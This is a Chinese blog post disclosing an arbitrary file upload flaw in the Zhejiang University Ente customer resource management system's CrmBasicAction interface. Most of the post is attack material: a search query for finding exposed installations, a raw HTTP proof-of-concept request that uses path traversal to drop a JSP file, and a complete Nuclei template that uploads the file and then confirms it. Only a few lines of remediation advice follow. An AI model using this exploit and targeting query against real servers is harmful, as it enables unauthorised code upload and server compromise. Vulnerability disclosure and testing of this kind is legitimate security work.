浙大恩特客户资源管理系统 crmbasicaction 接口任意文件上传

最新推荐文章于 2024-06-17 14:41:35 发布
最新推荐文章于 2024-06-17 14:41:35 发布
阅读量364 收藏 8
点赞数 9
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/136041966
版权

该文章由掌控安全学院——1782814368投稿

【产品介绍】

浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。

【漏洞介绍】

浙大恩特客户资源管理系统 crmbasicaction 任意文件上传攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!

【资产测绘Query】

title="欢迎使用浙大恩特客户资源管理系统"

【产品界面】

【poc】

POST /entsoft/CrmBasicAction.entcrm?method=zipFileUpload&c_transModel=old HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36
Content-Length: 267
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: multipart/form-data; boundary=1bx2RNaFAIqMv30qYgvkzL

--1bx2RNaFAIqMv30qYgvkzL
Content-Disposition: form-data; name="file"; filename="../../7tmwo44vzl.jsp"
Content-Type: application/zip


--1bx2RNaFAIqMv30qYgvkzL--

【Nuclei-Poc】

id: zhedaente-entsoft-fileupload-CrmBasicAction

info:
  name: zhedaente-entsoft-fileupload-CrmBasicAction
  author:
  severity: critical


variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"

http:
  - raw:
      - |
        POST /entsoft/CrmBasicAction.entcrm?method=zipFileUpload&c_transModel=old HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36
        Connection: close
        Content-Type: multipart/form-data; boundary={{boundary}}
        Accept-Encoding: gzip

        --{{boundary}}
        Content-Disposition: form-data; name="file"; filename="../../{{filename}}.jsp"
        Content-Type: application/zip


        --{{boundary}}--

      - |+
        GET /enterdoc/dao{{filepath}}{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36
        Content-Length: 0
        Accept-Encoding: gzip, deflate
        Connection: close

    extractors:
      - type: regex
        name: filepath
        part: body
        internal: true
        group: 1
        regex:
          - '(/\d+/)'


    matchers:
      - type: dsl
        dsl:
          - "status_code_2 == 200 && contains(body_2,'12321')"

【验证】

.\nuclei -l 1.txt -t 1.yaml

【修复建议】

1、请联系厂商进行修复。
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

zkzq
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
客户资源管理系统CrmBasicAction.entcrm接口存在任意文件漏洞
nnn2188185的博客
01-16 93
客户资源管理系统CrmBasicAction.entcrm接口存在任意文件漏洞
【漏洞复现】客户资源管理系统-crmbasicaction-任意文件
知黑而守白
01-09 479
杭州软信息技术有限公司()提供外贸管理软件、外贸客户管理软件等外贸软件,是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司,隶属江大学国家大学科技园,立足于中国外向型企业的管理软件系统的设计,研发和咨询服务。客户资源管理系统 CrmBasicAction接口权限设置不当,攻击者可以通过利用此漏洞,上恶意文件系统中,可能导致未授权访问、敏感信息泄露或系统完整性受损等严重后果。
客户资源管理系统 crmbasicaction 任意文件
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
01-16 453
客户资源管理系统中的crmbasicaction接口存在安全漏洞,允许攻击者向系统任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。
客户资源管理系统crmbasicaction任意文件-新接口
weixin_43167326的博客
01-21 410
客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。该系统CustomerAction.entphone;.js 接口允许攻击者向系统任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。。
客户资源管理系统 CrmBasicAction.entcrm任意文件
Keepb1ue的博客
01-10 1837
客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。
客户资源管理系统任意文件漏洞复现
0xSec
11-10 1447
客户资源管理系统中fileupload.jsp、CustomerAction.entphone、MailAction.entphone、machord_doc.jsp等接口处存在文件漏洞,未经身份认证的攻击者可以上任意后门文件,最终可导致服务器失陷。
客户资源管理系统 fileupload.jsp 任意文件
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
11-14 293
客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。客户资源管理系统中的fileupload.jsp接口存在安全漏洞,允许攻击者向系统任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。
【漏洞复现】客户资源管理系统 fileupload.jsp 任意文件漏洞
做自己喜欢的事,并将其发挥到极致!
11-15 798
杭州软信息技术有限公司(简称)提供外贸管理软件、外贸客户管理软件等外贸软件,是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司,该系统旨在帮助企业高效管理客户关系,提升销售业绩,促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示,帮助企业深度挖掘客户数据,提供决策参考。
外贸客户管理系统使用手册
11-10
外贸客户管理系统,外贸客户管理系统使用手册
软件操作流程样本.doc
12-18
软件操作流程样本.doc 软件操作流程样本是一种外贸软件顾客手册,旨在指导用户快速...该手册涵盖了登入系统、帐号管理、基本设立、邮箱设立和客户跟进等模块,旨在帮助用户快速上手软件,提高工作效率。
Ent animated character 动画角色 游戏树怪模型带动画资源包unitypackage项目
04-15
Ent animated character 动画角色 游戏树怪模型带动画资源包unitypackage项目 支持Unity版本2019.2.18或更高 动画 走 闲置的 空闲时间长 空闲_长_2 攻击 损害 死亡 纹理 512x512 多边形 3093
软件企业市场营销策略研究—以网络科技有限公司为例.doc
11-25
软件企业市场营销策略研究—以网络科技有限公司为例.doc
论文研究-基于I2C的烟雾报警系统接口模块的设计 .pdf
08-15
基于I2C的烟雾报警系统接口模块的设计,李,李冰,本文针对目前烟雾报警器无法有效联网准确输火灾位置的缺点,设计了一种基于I2C协议的总线式串行通信接口。利用I2C串行总线接口
【Qt实现录频】
m0_45463480的博客
06-13 182
请注意,这只是一个简单的示例代码,实际应用中你可能需要处理更多的细节,如捕获不同视频格式、处理录制过程中的错误等。希望这个示例对你有所帮助,另外你也可以在Qt官方文档中找到更多关于Qt Multimedia模块的详细信息。在Qt中实现录制视频可以通过使用Qt Multimedia模块来实现。在上面的示例中,VideoRecorder类提供了一个简单的界面,其中包括一个用于录制视频的按钮。当按钮被点击时,toggleRecord()槽函数将会启动或停止录制。
canal应用
qq_33816292的博客
06-12 154
canal分享模块链接。
MySQL触发器基本结构
最新发布
2301_80388658的博客
06-17 221
4、for each row 声明每次触发都被执行。create trigger 函数名。3、什么样的操作出发,操作那个表。after:......之后触发。befor:......之前触发。6、歘发起触发后执行代码块。可以修改成$$ //都行。2、创建触发器函数名称。insert:插入被触发。update:修改被触发。delete:删除被触发。
源码编译安装LAMP
潇的博客
06-12 894
LAMP 架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP(或Perl、Python)网页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其中Apache和MySQL的安装并没有严格的顺序;
Django UpdateView视图
人生苦短,何妨一试
06-11 468
UpdateView是Django中的一个通用视图,用于处理对象的更新操作。它允许用户更新一个已经存在的对象。UpdateView通常与一个模型表单一起使用,这样用户就可以看到当前对象的值,并可以修改它们。
richard g lyons答案
06-21
在他的职业生涯中,他先后担任过多个公司和机构的高级工程师和工程经理,包括美国斯普里公司(Sprynt)和雷神公司(Raytheon),并曾在加利福尼亚研究公司(CAL Corporation)担任副总裁。 在他的DSP研究和工作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值